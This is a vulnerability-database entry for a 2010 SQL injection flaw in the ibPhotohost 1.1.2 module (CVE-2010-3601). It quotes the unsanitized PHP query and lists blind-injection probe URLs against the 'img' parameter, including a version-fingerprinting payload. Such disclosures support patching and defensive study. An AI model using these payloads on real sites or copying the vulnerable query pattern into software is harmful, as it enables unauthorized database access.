Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
ibPhotohost 1.1.2 SQL Injection
2010-09-27 / 2010-09-28
Credit:
fred777
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2010-3601
CWE:
CWE-89
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
################################################# + + Title: ibPhotohost 1.1.2 SQL Injection + Author: fred777 - [fred777.5x.to] + Link: http://mods.invisionize.com/index.php/f/7609 + Vuln: index.php?autocom=photohost&CODE=04&img=[SQL Injection] + Greetzz to: back2hack,free-hack,hackbase,c-c + Contact: nebelfrost77@googlemail.com + ################################################# --[ Vuln Code ] -- $id = $this->ipsclass->input['img']; $this->ipsclass->DB->simple_construct(array( 'select' => '*', 'from' => 'imgupload', 'where' => 'imgupload_id=' . $id, 'order' => 'imgupload_date asc' )); ################################################ --[ Exploitable ]-- http://site/index.php?autocom=photohost&CODE=04&img=[SQL Injection] http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false http://site/index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5 ################################################
Referencje:
http://www.vupen.com/english/advisories/2010/2437
http://www.securityfocus.com/bid/43374
http://www.exploit-db.com/exploits/15070
http://packetstormsecurity.org/1009-exploits/ibphotohost-sql.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top